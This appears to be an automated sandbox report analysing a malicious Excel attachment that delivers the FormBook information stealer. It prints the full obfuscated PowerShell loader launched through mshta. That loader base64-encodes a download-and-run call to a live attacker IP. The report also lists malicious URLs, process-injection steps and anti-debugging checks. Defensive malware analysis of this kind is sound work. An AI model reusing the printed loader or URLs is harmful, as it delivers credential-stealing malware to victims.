Process queried: DebugPort

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00AB0101 rdtsc

13_2_00AB0101

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk,

13_2_00A607AC

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A50080 mov ecx, dword ptr fs:[00000030h]	13_2_00A50080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A500EA mov eax, dword ptr fs:[00000030h]	13_2_00A500EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A726F8 mov eax, dword ptr fs:[00000030h]	13_2_00A726F8

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_exec.exe.11.dr

Jump to dropped file

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\temp_exec.exe VolumeInformation	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.78.54	unknown	United States	13335	CLOUDFLARENETUS	false
104.168.7.7	unknown	United States	36352	AS-COLOCROSSINGUS	true
172.67.216.244	og1.in	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
og1.in	172.67.216.244	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://og1.in/Ts9zje	false	0%, Virustotal, Browse	unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.hta	true	1%, Virustotal, Browse	unknown
http://104.168.7.7/356/IEnetbookupdation.vbs	true		unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Avira: detection malicious, Label: HEUR/AGEN.1332117

Multi AV Scanner detection for submitted file

Source: PI#0034250924.xla.xlsx	ReversingLabs: Detection: 18%
Source: PI#0034250924.xla.xlsx	Virustotal: Detection: 23%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PI#0034250924.xla.xlsx

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: og1.in
Source: global traffic	DNS query: name: og1.in

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
